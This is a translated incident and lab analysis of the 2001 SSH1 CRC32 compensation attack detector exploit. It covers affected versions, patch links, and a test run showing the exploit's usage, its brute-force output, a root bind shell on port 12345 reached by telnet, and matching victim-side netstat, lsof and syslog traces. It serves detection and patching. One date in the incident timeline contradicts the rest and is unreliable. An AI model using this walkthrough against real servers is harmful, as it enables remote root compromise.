Analysis of the SSH crc32 compensation attack detector exploit

Source: Internet  2008-06-01 01:10:16

Since the SSH crc32 compensation attack detector exploit code began circulating, scanning for SSH servers has increased steadily. The following is a statistical report of the probes observed:

+------------+------------+----------+----------+-----------+
| date       | #Probes    | #Sources | #Targets | #Scanners |
+------------+------------+----------+----------+-----------+
| 2001-10-03 |       1466 |       45 |      987 |           |
| 2001-10-04 |        319 |       25 |      212 |           |
| 2001-10-05 |        825 |       22 |      783 |           |
| 2001-10-06 |      86552 |       27 |    86305 |           |
| 2001-10-07 |       7564 |       29 |     7429 |           |
| 2001-10-08 |       2506 |       29 |     2449 |           |
| 2001-10-09 |       1010 |       18 |      263 |           |
| 2001-10-10 |        480 |       39 |      307 |           |
| 2001-10-11 |        978 |       31 |      504 |           |
| 2001-10-12 |        436 |       21 |      311 |           |
| 2001-10-13 |       6731 |       27 |     6353 |           |
| 2001-10-14 |       1411 |       29 |     1084 |           |
| 2001-10-15 |        936 |       34 |      723 |           |
| 2001-10-16 |       1358 |       40 |     1256 |           |
| 2001-10-17 |       1098 |       36 |      899 |           |
| 2001-10-18 |       1779 |       31 |     1438 |           |
| 2001-10-19 |      19722 |       28 |    19573 |         7 |
| 2001-10-20 |      25539 |       21 |    25419 |         3 |
| 2001-10-21 |       6796 |       26 |     6750 |         9 |
| 2001-10-22 |        807 |       30 |      482 |         5 |
| 2001-10-23 |        578 |       49 |      327 |         6 |
| 2001-10-24 |       2198 |       39 |     2025 |         9 |
| 2001-10-25 |       2368 |       31 |     1759 |         6 |
| 2001-10-26 |        712 |       37 |      591 |         7 |
| 2001-10-27 |        463 |       30 |      297 |         8 |
| 2001-10-28 |        495 |       30 |      263 |         5 |
| 2001-10-29 |        478 |       37 |      399 |         5 |
| 2001-10-30 |       1154 |       48 |     1051 |         5 |
| 2001-10-31 |       1998 |       46 |     1047 |         5 |
| 2001-11-01 |      66660 |       46 |    66386 |         5 |
| 2001-11-02 |       1514 |       40 |      926 |         5 |
| 2001-11-03 |       2142 |       36 |     2047 |         8 |
| 2001-11-04 |       1233 |       26 |      781 |         9 |
+------------+------------+----------+----------+-----------+

In view of this situation, David A. Dittrich's <dittrich@cac.washington.edu> article (http://staff.washington.edu/dittrich/misc/ssh-analysis.txt) has been translated and compiled here for reference and to help with patching.

-------------------------------------------------------------------------------

Overview

========

The vulnerability was first disclosed by CORE-SDI in their security advisory CORE-20010207, posted to BUGTRAQ on securityfocus.com and dated February 8, 2001:

http://www.securityfocus.com/advisories/3088

In brief: an integer overflow exists in a piece of code shipped with the ssh1 daemon. The problem is in deattack.c, written by CORE SDI to protect the SSH1 protocol against the CRC32 compensation attack. In the detect_attack() function, a 16-bit unsigned variable is mistakenly used as if it were 32 bits wide, which leads to a table index overflow. This allows an attacker to overwrite arbitrary locations in memory, and the attacker may remotely obtain root privileges.

Other organizations subsequently published their own analyses of and advice on this SSH vulnerability, for example:

 http://xforce.iss.net/alerts/advise100.php

 http://razor.bindview.com/publish/advisories/adv_ssh1crc.html

 http://www.securityfocus.com/bugid=2347

On October 21, 2001, Jay Dyson reported on the incidents@securityfocus.com mailing list that there was considerable evidence of someone scanning the RIPE network ranges for SSH servers:

 http://www.securityfocus.com/cgi-bin/archive.pl?id=75&start=2001-10-27&end=2001-11-02&mid=221998&threads=1

Worse, a post to the vuln-dev@securityfocus.com mailing list pointed to a Newsbytes.com news story reporting that someone was offering US$1000 to anyone who would supply this attack tool. There were also unconfirmed rumors that exploit code for Solaris 8/SPARC SSH.com 1.2.26-31 systems exists. The well-known security site securitynewsportal.com was compromised through this vulnerability; a screenshot of the defacement is at the address below:

 http://defaced.alldas.de/mirror/2001/10/24/www.securitynewsportal.com/

TESO recently released a statement about this exploit code, which you can read at:

 http://www.team-teso.org/sshd_statement.php

The affected SSH versions are:

SSH Communications Security SSH 2.x and 3.x (if SSH Version 1 fallback is enabled)
SSH Communications Security SSH 1.2.23-1.2.31
F-Secure SSH versions prior to 1.3.11-2
OpenSSH versions prior to 2.3.0 (if SSH Version 1 fallback is enabled)
OSSH 1.5.7

Vendors have already provided patch information for their systems; see the following addresses:

 http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm

 http://openssh.org/security.html

 http://www.cisco.com/warp/public/707/SSH-multiple-pub.html

---------------------------------------------------------------------------

Analysis of the attack

======================

On October 6, 2001, attackers operating from a network in the Netherlands used the crc32 compensation attack detector exploit to break into a Red Hat Linux system on the UW network that was running OpenSSH 2.1.1. The vulnerability is described in CERT VU#945216:

 http://www.kb.cert.org/vuls/id/945216

A series of operating system commands on the host were replaced with trojaned versions to provide later re-entry, and all of the system logs were wiped. A second SSH server was run on the high port 39999/tcp, and after the break-in the host was used to scan networks outside UW for more systems running OpenSSH 2.1.1.

After some recovery work the exploit program was analyzed. The exploit code is based on OpenSSH 2.2.0 (the version after 2.1.1, in which the crc32 compensation attack detection function had been patched), but it targets OpenSSH 2.1.1; the exploit also works against ssh.com 1.2.31 (tests against other SSH protocol 1 implementations and versions have not been completed).

The exploit code targets the following systems:

 linux/x86 ssh.com 1.2.26-1.2.31 rhl
 linux/x86 openssh 1.2.3 (maybe others)
 linux/x86 openssh 2.2.0p1 (maybe others)
 freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl

Although the exploit can attack several platforms, in this case the attacker only scanned port 22/tcp, then connected to the responding systems to obtain the version banner and proceeded further only against "OpenSSH_2.1.1". The scans used a fast SYN scanner, a tool taken from the t0rn root kit.

Analysis of the compromised system found that 47,067 addresses had been scanned; of these, 1,244 hosts were identified as vulnerable, and the attacker successfully broke into 4 of them through this vulnerability before the system was taken offline on August 8.

The exploit does not work correctly against systems that use access control restrictions (e.g. SSH.com's "AllowHosts" or "DenyHosts" settings) or packet filtering (e.g. ipchains, iptables, ipf), because these require the exchange of public keys.

-------------------------------------------------------------------------

Live analysis of the exploit code

=================================

The exploit was tested on an isolated network segment using the address range 10.10.10.0/24; the attacking host was 10.10.10.10 and the vulnerable server was 10.10.10.3. The vulnerable server ran SSH.com version 1.2.31 on Red Hat Linux 6.0 (kernel 2.2.16-3 on an i586). The attacking host ran Fred Cohen's PLAC[1] (a Linux 2.4.5 system booted from CD-ROM), and the files were copied onto it with "nc" (Netcat)[2].

Attacker-side view

==================

Running the exploit with no arguments prints its usage information:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac /bin >> ./ssh
linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from
openssh 2.2.0 src
greets: mray, random, big t, sh1fty, scut, dvorak
ps. this sploit already owned cia.gov :/
**please pick a type**
Usage: ./ssh host [options]
Options:
-p port
-b base Base address to start bruteforcing distance, by default 0x1800,
goes as high as 0x10000
-t type
-d debug mode
-o Add this to delta_min
types:
0: linux/x86 ssh.com 1.2.26-1.2.31 rhl
1: linux/x86 openssh 1.2.3 (maybe others)
2: linux/x86 openssh 2.2.0p1 (maybe others)
3: freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

The system under test ran SSH.com version 1.2.31 (unpatched) on port 2222, with its syslog output redirected to a separate file, sshdx.log. Type 0 and target port 2222 were selected:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac /bin >> ./ssh 10.10.10.3 -p 2222 -t 0
linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from
openssh 2.2.0 src
greets: mray, random, big t, sh1fty, scut, dvorak
ps. this sploit already owned cia.gov :/
...........................
bruteforced distance: 0x3200
bruteforcing distance from h->partial packet buffer on stack
..............^[[A................|////////\\\\!
bruteforced h->ident buff distance: 5bfbed88
trying retloc_delta: 35
....!
found high Words of possible return address: 808
trying to exploit
....
trying retloc_delta: 37
.!
found high words of possible return address: 805
trying to exploit
....
trying retloc_delta: 39
......
trying retloc_delta: 3b
......
trying retloc_delta: 3d
!
found high words of possible return address: 804
trying to exploit
....
trying retloc_delta: 3f
......
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

At this point the exploit appears to have "hung", but going back to the target system shows that a backdoor has been opened.

Victim-side view

================

Before exploitation, the target system shows the standard SSH daemon listening on 22/tcp and the instance under test listening on 2222/tcp, both in LISTEN state, with the standard daemon holding one external connection (10.10.10.2:33354), as netstat shows:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 10.10.10.3:2222         0.0.0.0:*               LISTEN
tcp        0      0 10.10.10.3:22           10.10.10.2:33354        ESTABLISHED
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
raw        0      0 0.0.0.0:1               0.0.0.0:*               7
raw        0      0 0.0.0.0:6               0.0.0.0:*               7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

After the exploit has "hung", netstat shows the following listening state:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:12345           0.0.0.0:*               LISTEN
tcp        0      0 10.10.10.3:2222         10.10.10.10:32965       ESTABLISHED
tcp        0      0 10.10.10.3:2222         0.0.0.0:*               LISTEN
tcp        0      0 10.10.10.3:22           10.10.10.2:33354        ESTABLISHED
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
raw        0      0 0.0.0.0:1               0.0.0.0:*               7
raw        0      0 0.0.0.0:6               0.0.0.0:*               7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

A new service is now listening on 12345/tcp.

Checking the target's network state again with netstat while the exploit is running shows the brute-force address guessing in progress, one short-lived connection per attempt:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:12345           0.0.0.0:*               LISTEN
tcp     1252      0 10.10.10.3:2222         10.10.10.10:33076       ESTABLISHED
tcp        0      0 10.10.10.3:2222         10.10.10.10:33075       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33074       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33072       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33071       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33069       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33067       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33066       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33064       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33063       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33062       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33061       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33060       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33059       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33058       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33056       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33055       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33053       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33051       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33050       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33048       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33047       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33046       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33042       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33041       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33040       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33039       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33038       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33036       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33035       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33034       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33033       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33032       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33030       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33029       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33028       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33027       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33024       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33023       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33022       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33021       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33020       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33016       TIME_WAIT
tcp        0      0 10.10.10.3:2222         10.10.10.10:33014       TIME_WAIT
tcp        0      0 10.10.10.3:2222         0.0.0.0:*               LISTEN
tcp        0      0 10.10.10.3:22           10.10.10.2:33354        ESTABLISHED
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
raw        0      0 0.0.0.0:1               0.0.0.0:*               7
raw        0      0 0.0.0.0:6               0.0.0.0:*               7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

The LiSt Open Files ("lsof")[4] tool shows that the SSH daemon under test has opened a new listening socket:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# lsof -p 9364
COMMAND  PID USER  FD TYPE DEVICE    SIZE   NODE NAME
sshd    9364 root cwd  DIR    3,3    1024      2 /
sshd    9364 root rtd  DIR    3,3    1024      2 /
sshd    9364 root txt  REG    3,3  655038 442413 /usr/local/src/ssh-1.2.31/sbin/sshd1
sshd    9364 root mem  REG    3,3  340771  30722 /lib/ld-2.1.3.so
sshd    9364 root mem  REG    3,3  370141  31107 /lib/libnsl-2.1.3.so
sshd    9364 root mem  REG    3,3   66231  31103 /lib/libcrypt-2.1.3.so
sshd    9364 root mem  REG    3,3   47008  31113 /lib/libutil-2.1.3.so
sshd    9364 root mem  REG    3,3 4101836  31102 /lib/libc-2.1.3.so
sshd    9364 root mem  REG    3,3  246652  31109 /lib/libnss_files-2.1.3.so
sshd    9364 root mem  REG    3,3  252234  31111 /lib/libnss_nisplus-2.1.3.so
sshd    9364 root mem  REG    3,3  255963  31110 /lib/libnss_nis-2.1.3.so
sshd    9364 root mem  REG    3,3   67580  31108 /lib/libnss_dns-2.1.3.so
sshd    9364 root mem  REG    3,3  169720  31112 /lib/libresolv-2.1.3.so
sshd    9364 root  0u  CHR    1,3           4110 /dev/null
sshd    9364 root  1u  CHR    1,3           4110 /dev/null
sshd    9364 root  2u  CHR    1,3           4110 /dev/null
sshd    9364 root  3u inet  10202            TCP *:12345 (LISTEN)
sshd    9364 root  4u inet  10197            TCP 10.10.10.3:2222->10.10.10.10:33190 (CLOSE_WAIT)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Clearly the exploit succeeded: it obtained a root shell and bound it to a high TCP port. The attacker can then connect to that port with "telnet" or "nc" and execute arbitrary commands as the superuser, as shown below:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac ~ >> telnet 10.10.10.3 12345
Trying 10.10.10.3...
Connected to 10.10.10.3.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
date;
Thu Nov 1 18:04:42 PST 2001
netstat -an --inet;
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 10.10.10.3:12345        10.10.10.10:33077       ESTABLISHED
tcp        0      0 0.0.0.0:12345           0.0.0.0:*               LISTEN
tcp     1252      0 10.10.10.3:2222         10.10.10.10:33076       ESTABLISHED
tcp        0      0 10.10.10.3:2222         0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
raw        0      0 0.0.0.0:1               0.0.0.0:*               7
raw        0      0 0.0.0.0:6               0.0.0.0:*               7
exit;
Connection closed by foreign host.
root@plac ~ >>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[Note]: when using telnet, each command must be terminated with ";"; a connection made with nc does not need this.

After the attacker exits, the target system's network state returns to normal:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 10.10.10.3:2222         0.0.0.0:*               LISTEN
tcp        0      0 10.10.10.3:22           10.10.10.2:33354        ESTABLISHED
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
raw        0      0 0.0.0.0:1               0.0.0.0:*               7
raw        0      0 0.0.0.0:6               0.0.0.0:*               7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

If syslog logging is enabled, every connection and brute-force attempt is recorded (note that this test was of SSH.com 1.2.31 on Red Hat Linux 6.0; the log tags will differ from those OpenSSH records):

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Nov 1 18:46:14 victim sshd[9510]: log: Connection from 10.10.10.10 port 33298
Nov 1 18:46:19 victim sshd[9511]: log: Connection from 10.10.10.10 port 33299
Nov 1 18:46:22 victim sshd[9512]: log: Connection from 10.10.10.10 port 33300
Nov 1 18:46:26 victim sshd[9513]: log: Connection from 10.10.10.10 port 33301
Nov 1 18:46:31 victim sshd[9515]: log: Connection from 10.10.10.10 port 33302
Nov 1 18:46:35 victim sshd[9516]: log: Connection from 10.10.10.10 port 33303
Nov 1 18:46:39 victim sshd[9517]: log: Connection from 10.10.10.10 port 33304
Nov 1 18:46:43 victim sshd[9518]: log: Connection from 10.10.10.10 port 33305
Nov 1 18:46:47 victim sshd[9518]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:46:47 victim sshd[9519]: log: Connection from 10.10.10.10 port 33306
Nov 1 18:46:52 victim sshd[9519]: fatal: Connection closed by remote host.
Nov 1 18:46:53 victim sshd[9520]: log: Connection from 10.10.10.10 port 33307
Nov 1 18:46:57 victim sshd[9521]: log: Connection from 10.10.10.10 port 33308
Nov 1 18:47:01 victim sshd[9522]: log: Connection from 10.10.10.10 port 33309
Nov 1 18:47:06 victim sshd[9523]: log: Connection from 10.10.10.10 port 33310
Nov 1 18:47:10 victim sshd[9524]: log: Connection from 10.10.10.10 port 33311
Nov 1 18:47:14 victim sshd[9525]: log: Connection from 10.10.10.10 port 33312
Nov 1 18:47:19 victim sshd[9526]: log: Connection from 10.10.10.10 port 33313
Nov 1 18:47:24 victim sshd[9527]: log: Connection from 10.10.10.10 port 33314
Nov 1 18:47:24 victim sshd[9527]: fatal: Connection closed by remote host.
Nov 1 18:47:46 victim sshd[9528]: log: Connection from 10.10.10.10 port 33315
Nov 1 18:47:46 victim sshd[9529]: log: Connection from 10.10.10.10 port 33316
Nov 1 18:47:47 victim sshd[9530]: log: Connection from 10.10.10.10 port 33317
Nov 1 18:47:47 victim sshd[9531]: log: Connection from 10.10.10.10 port 33318
Nov 1 18:47:47 victim sshd[9532]: log: Connection from 10.10.10.10 port 33319
Nov 1 18:47:48 victim sshd[9533]: log: Connection from 10.10.10.10 port 33320
Nov 1 18:47:48 victim sshd[9534]: log: Connection from 10.10.10.10 port 33321
Nov 1 18:47:48 victim sshd[9535]: log: Connection from 10.10.10.10 port 33322
Nov 1 18:47:49 victim sshd[9536]: log: Connection from 10.10.10.10 port 33323
Nov 1 18:47:49 victim sshd[9537]: log: Connection from 10.10.10.10 port 33324
Nov 1 18:47:50 victim sshd[9538]: log: Connection from 10.10.10.10 port 33325
Nov 1 18:47:50 victim sshd[9539]: log: Connection from 10.10.10.10 port 33326
Nov 1 18:47:50 victim sshd[9540]: log: Connection from 10.10.10.10 port 33327
Nov 1 18:47:51 victim sshd[9541]: log: Connection from 10.10.10.10 port 33328
Nov 1 18:47:51 victim sshd[9542]: log: Connection from 10.10.10.10 port 33329
Nov 1 18:47:51 victim sshd[9543]: log: Connection from 10.10.10.10 port 33330
Nov 1 18:47:52 victim sshd[9544]: log: Connection from 10.10.10.10 port 33331
Nov 1 18:47:52 victim sshd[9545]: log: Connection from 10.10.10.10 port 33332
Nov 1 18:47:52 victim sshd[9546]: log: Connection from 10.10.10.10 port 33333
Nov 1 18:47:53 victim sshd[9547]: log: Connection from 10.10.10.10 port 33334
Nov 1 18:47:53 victim sshd[9548]: log: Connection from 10.10.10.10 port 33335
Nov 1 18:47:54 victim sshd[9549]: log: Connection from 10.10.10.10 port 33336
Nov 1 18:47:54 victim sshd[9550]: log: Connection from 10.10.10.10 port 33337
Nov 1 18:47:54 victim sshd[9551]: log: Connection from 10.10.10.10 port 33338
Nov 1 18:47:55 victim sshd[9552]: log: Connection from 10.10.10.10 port 33339
Nov 1 18:47:55 victim sshd[9553]: log: Connection from 10.10.10.10 port 33340
Nov 1 18:47:55 victim sshd[9554]: log: Connection from 10.10.10.10 port 33341
Nov 1 18:47:56 victim sshd[9555]: log: Connection from 10.10.10.10 port 33342
Nov 1 18:47:56 victim sshd[9556]: log: Connection from 10.10.10.10 port 33343
Nov 1 18:47:56 victim sshd[9555]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:47:57 victim sshd[9557]: log: Connection from 10.10.10.10 port 33344
Nov 1 18:47:57 victim sshd[9558]: log: Connection from 10.10.10.10 port 33345
Nov 1 18:47:57 victim sshd[9559]: log: Connection from 10.10.10.10 port 33346
Nov 1 18:47:58 victim sshd[9560]: log: Connection from 10.10.10.10 port 33347
Nov 1 18:47:58 victim sshd[9561]: log: Connection from 10.10.10.10 port 33348
Nov 1 18:47:59 victim sshd[9562]: log: Connection from 10.10.10.10 port 33349
Nov 1 18:47:59 victim sshd[9563]: log: Connection from 10.10.10.10 port 33350
Nov 1 18:47:59 victim sshd[9564]: log: Connection from 10.10.10.10 port 33351
Nov 1 18:48:00 victim sshd[9565]: log: Connection from 10.10.10.10 port 33352
Nov 1 18:48:00 victim sshd[9566]: log: Connection from 10.10.10.10 port 33353
Nov 1 18:48:00 victim sshd[9567]: log: Connection from 10.10.10.10 port 33354
Nov 1 18:48:01 victim sshd[9568]: log: Connection from 10.10.10.10 port 33355
Nov 1 18:48:01 victim sshd[9569]: log: Connection from 10.10.10.10 port 33356
Nov 1 18:48:02 victim sshd[9570]: log: Connection from 10.10.10.10 port 33357
Nov 1 18:48:02 victim sshd[9571]: log: Connection from 10.10.10.10 port 33358
Nov 1 18:48:02 victim sshd[9572]: log: Connection from 10.10.10.10 port 33359
Nov 1 18:48:03 victim sshd[9573]: log: Connection from 10.10.10.10 port 33360
Nov 1 18:48:03 victim sshd[9574]: log: Connection from 10.10.10.10 port 33361
Nov 1 18:48:03 victim sshd[9575]: log: Connection from 10.10.10.10 port 33362
Nov 1 18:48:04 victim sshd[9576]: log: Connection from 10.10.10.10 port 33363
Nov 1 18:48:04 victim sshd[9577]: log: Connection from 10.10.10.10 port 33364
Nov 1 18:48:04 victim sshd[9578]: log: Connection from 10.10.10.10 port 33365
Nov 1 18:48:05 victim sshd[9579]: log: Connection from 10.10.10.10 port 33366
Nov 1 18:48:05 victim sshd[9580]: log: Connection from 10.10.10.10 port 33367
Nov 1 18:48:06 victim sshd[9581]: log: Connection from 10.10.10.10 port 33368
Nov 1 18:48:06 victim sshd[9582]: log: Connection from 10.10.10.10 port 33369
Nov 1 18:48:06 victim sshd[9583]: log: Connection from 10.10.10.10 port 33370
Nov 1 18:48:07 victim sshd[9584]: log: Connection from 10.10.10.10 port 33371
Nov 1 18:48:07 victim sshd[9585]: log: Connection from 10.10.10.10 port 33372
Nov 1 18:48:07 victim sshd[9586]: log: Connection from 10.10.10.10 port 33373
Nov 1 18:48:08 victim sshd[9587]: log: Connection from 10.10.10.10 port 33374
Nov 1 18:48:08 victim sshd[9586]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:08 victim sshd[9588]: log: Connection from 10.10.10.10 port 33375
Nov 1 18:48:08 victim sshd[9587]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:08 victim sshd[9589]: log: Connection from 10.10.10.10 port 33376
Nov 1 18:48:08 victim sshd[9588]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9590]: log: Connection from 10.10.10.10 port 33377
Nov 1 18:48:09 victim sshd[9589]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9591]: log: Connection from 10.10.10.10 port 33378
Nov 1 18:48:09 victim sshd[9590]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9592]: log: Connection from 10.10.10.10 port 33379
Nov 1 18:48:09 victim sshd[9591]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:10 victim sshd[9592]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:10 victim sshd[9593]: log: Connection from 10.10.10.10 port 33380
Nov 1 18:48:10 victim sshd[9594]: log: Connection from 10.10.10.10 port 33381
Nov 1 18:48:10 victim sshd[9593]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:11 victim sshd[9595]: log: Connection from 10.10.10.10 port 33382
Nov 1 18:48:11 victim sshd[9594]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:11 victim sshd[9596]: log: Connection from 10.10.10.10 port 33383
Nov 1 18:48:11 victim sshd[9597]: log: Connection from 10.10.10.10 port 33384
Nov 1 18:48:11 victim sshd[9596]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9598]: log: Connection from 10.10.10.10 port 33385
Nov 1 18:48:12 victim sshd[9597]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9599]: log: Connection from 10.10.10.10 port 33386
Nov 1 18:48:12 victim sshd[9598]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9600]: log: Connection from 10.10.10.10 port 33387
Nov 1 18:48:12 victim sshd[9599]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:13 victim sshd[9601]: log: Connection from 10.10.10.10 port 33388
Nov 1 18:48:13 victim sshd[9602]: log: Connection from 10.10.10.10 port 33389
Nov 1 18:48:13 victim sshd[9603]: log: Connection from 10.10.10.10 port 33390
Nov 1 18:48:14 victim sshd[9604]: log: Connection from 10.10.10.10 port 33391
Nov 1 18:48:14 victim sshd[9605]: log: Connection from 10.10.10.10 port 33392
Nov 1 18:48:15 victim sshd[9606]: log: Connection from 10.10.10.10 port 33393
Nov 1 18:48:15 victim sshd[9605]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:48:15 victim sshd[9607]: log: Connection from 10.10.10.10 port 33394
Nov 1 18:48:16 victim sshd[9608]: log: Connection from 10.10.10.10 port 33395
Nov 1 18:48:16 victim sshd[9609]: log: Connection from 10.10.10.10 port 33396
Nov 1 18:48:16 victim sshd[9610]: log: Connection from 10.10.10.10 port 33397
Nov 1 18:48:17 victim sshd[9611]: log: Connection from 10.10.10.10 port 33398
Nov 1 18:48:17 victim sshd[9611]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:48:17 victim sshd[9612]: log: Connection from 10.10.10.10 port 33399
Nov 1 18:48:18 victim sshd[9613]: log: Connection from 10.10.10.10 port 33400
Nov 1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401
Nov 1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

